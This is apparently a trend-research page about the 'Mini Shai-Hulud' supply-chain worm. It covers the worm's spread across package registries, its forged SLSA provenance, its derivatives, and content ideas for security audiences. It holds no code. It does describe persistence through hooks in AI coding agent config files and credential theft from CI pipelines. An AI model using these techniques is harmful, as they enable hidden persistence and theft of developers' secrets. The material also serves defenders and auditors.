Mini Shai-Hulud
Mini Shai-Hulud is the fourth-generation variant of the Shai-Hulud supply-chain worm family, built by threat group TeamPCP to self-propagate across npm, PyPI, and Packagist by stealing CI/CD credentials and republishing infected packages through compromised maintainer accounts.
First detected in April 2026 targeting SAP packages, Mini Shai-Hulud reached critical mass on May 11, 2026, when it compromised 42 TanStack packages with valid SLSA Build Level 3 provenance attestations — the first documented case of a worm defeating cryptographic supply-chain integrity controls. On May 12, 2026, TeamPCP open-sourced the complete attack toolkit on GitHub, making the worm-as-a-service available to any threat actor.
Think of it as a skeleton key that clones itself into every lock it opens.
Search Interest
-
Nascent0–7 days
-
Emergent8–30 days
-
Validating ← now31–90 days
-
Rising91–180 days
-
Established180 days +
Why is it emerging now?
Mini Shai-Hulud broke two npm supply-chain defenses: it forged valid SLSA Build Level 3 provenance and survived remediation via AI coding agent session hooks. TeamPCP open-sourced the full toolkit May 12, 2026 — derivatives Miasma and Hades are already active.
Akamai Security Research
Outlook
6-month signal projection and commercial timeline.
Open-sourced worm toolkit accelerates derivative campaigns; AI coding agent config files are now a confirmed propagation surface every security team must address.
Risk · Microsoft and Red Hat credential revocation could collapse active Miasma/Hades wave spread before broader adoption.
Analogs · XZ Utils backdoor · event-stream malware · SolarWinds SUNBURST
-
nowIncident response in demand
Security teams auditing CI/CD pipelines and AI agent config files; paid advisory, scanning tooling in immediate demand.
-
3-6moSupply chain hardening products
Vendors build OIDC policy analyzers, CI cache validators, and AI agent config scanners targeting the specific Mini Shai-Hulud attack surface.
-
6-12moCompliance and SLSA reform
SLSA specification update to address provenance forgery via pipeline hijack; compliance auditors add AI agent session hooks to review checklists.
Competition & Opportunity for term “Mini Shai-Hulud”
Three heuristic signals derived from the tracked queries, the term's monetization cards, and its cluster neighbors. Directional, not audited.
Ideas for term “Mini Shai-Hulud”
Buildable pitches — turn this term into an article, site, product, post, newsletter, video, or course. Steal any card and run with it.
High-intent explainer for the 'mini shai-hulud' query; zero competition from pre-existing pages targeting this exact term. Hooks the SLSA-defeat angle for security-literate readers.
Comparison article for security professionals needing a reference on the three active campaign branches; satisfies the 'what is the difference between Miasma and Mini Shai-Hulud' query.
Practical audit checklist: suspicious preinstall hooks, Bun runtime downloads, binding.gyp patterns, forked optionalDependencies, AI agent config file changes.
Deep analysis piece targeting platform engineers; the SLSA-forgery-via-pipeline-hijack angle has no prior coverage and is a strong SEO gap in the SLSA specification community.
GitHub Action that validates pull_request_target permissions, cache integrity, and OIDC scope restrictions — closes the exact three chained vulnerabilities CVE-2026-45321 exploited.
Pre-commit hook or SaaS scanner that detects unexpected changes to .claude/settings.json, .vscode/tasks.json, .gemini/settings.json — the persistence hooks Mini Shai-Hulud survives remediation through.
Security YouTube walkthrough in a sandboxed environment; the SLSA-defeat mechanism is highly visual and counterintuitive — strong candidate for a 'wait, this is real?' viral moment.
You checked the Sigstore signature. The SLSA Build Level 3 badge was there. The npm package was still malware.
On May 12, 2026, the group behind 170+ compromised npm packages posted their full attack code to GitHub. Two weeks later, Miasma used it to hit Red Hat. Then Microsoft.
Mini Shai-Hulud doesn't just steal your AWS keys — it writes itself into .claude/settings.json so it re-executes every time you open your project in Claude Code, even after you've 'fixed' the compromised package.
What People Search
Long-tail queries from Google Suggest + Trends. Volume and competition are heuristics — directional, not audited. Content Type comes from query shape.
SERP of term “Mini Shai-Hulud”
What searchers see today — organic results on top, paid ads if anyone's bidding. Ad density is a real-time commercial signal.
FAQ
What is Mini Shai-Hulud?
Mini Shai-Hulud is the fourth-generation variant of the Shai-Hulud supply-chain worm family, built by threat group TeamPCP to self-propagate across npm, PyPI, and Packagist by stealing CI/CD credentials and republishing infected packages….
Why is Mini Shai-Hulud emerging now?
Mini Shai-Hulud broke two npm supply-chain defenses: it forged valid SLSA Build Level 3 provenance and survived remediation via AI coding agent session hooks. TeamPCP open-sourced the full toolkit May 12, 2026 — derivatives Miasma and Hades are already active.
When did Mini Shai-Hulud emerge?
Publicly emerged around 2026-04-29 (about 46 days ago as of 2026-06-14). EarlyTerms first recorded a pipeline signal on 2026-05-12.
Related Terms
Other terms in the same space — aliases, subtypes, competitors, and neighbors to explore next.
- Includes miasma Miasma is a self-propagating supply-chain worm that steals developer credentials and cloud secrets by hijacking npm packages, PyPI… →
- Related protestware Protestware is open-source software that a maintainer intentionally sabotages to deliver a political or social message, targeting users… →
- Related npmx npmx is an open-source, community-built alternative web frontend for the npm registry, offering modern UX features the official… →
- Related agent-traps "Agent traps" is the shorthand English phrase that maps one-to-one to AI Agent Traps, the taxonomy Google DeepMind published on March… →
- Related stop-hook A Stop hook is the Claude Code lifecycle event that fires every time the agent finishes a response turn. →
- Related claude-code Claude Code is Anthropic's official command-line coding agent — a terminal tool that reads your codebase, edits files, runs commands,… →
- Related coding-agents Coding Agents is the category name for AI developer tools that act on code autonomously — reading a repo, planning a change, editing… →
- Related webhook-secrets A webhook secret is a shared string used to authenticate webhook deliveries: the sender computes an HMAC signature over the payload with… →
- Related dependency-cooldowns A dependency cooldown is an intentional delay between when a package version is published and when your project is allowed to install it. →
- Part of ·
- Related
Sources
Primary URLs this report cites — open any to verify the claim yourself.
- 01 Akamai Security Research: Mini Shai-Hulud Worm Returns and Goes Public (May 12, 2026) akamai.com ↗
- 02 Snyk: TanStack npm Packages Hit by Mini Shai-Hulud — SLSA BL3 provenance defeated (May 12, 2026) snyk.io ↗
- 03 SafeDep: Mini Shai-Hulud Strikes Again — 314 npm Packages Compromised (May 19, 2026) safedep.io ↗
- 04 StepSecurity: TeamPCP's Mini Shai-Hulud Is Back — TanStack Self-Spreading Supply Chain Attack (May 12, 2026) stepsecurity.io ↗
- 05 Tenable: Mini Shai-Hulud FAQ — CVE-2026-45321, CVSS 9.6, four campaign waves (May 2026) tenable.com ↗
- 06 Semgrep: Mini Shai-Hulud Spreads to Packagist via Malicious Intercom PHP Composer Plugin (May 2026) semgrep.dev ↗
- 07 Socket: Mini Shai-Hulud, Miasma, and Hades Target Bioinformatics and MCP Developers (Jun 13, 2026) socket.dev ↗
- 08 Cloud Security Alliance: Mini Shai-Hulud Multi-Ecosystem Supply Chain Attack Research Note labs.cloudsecurityalliance.org ↗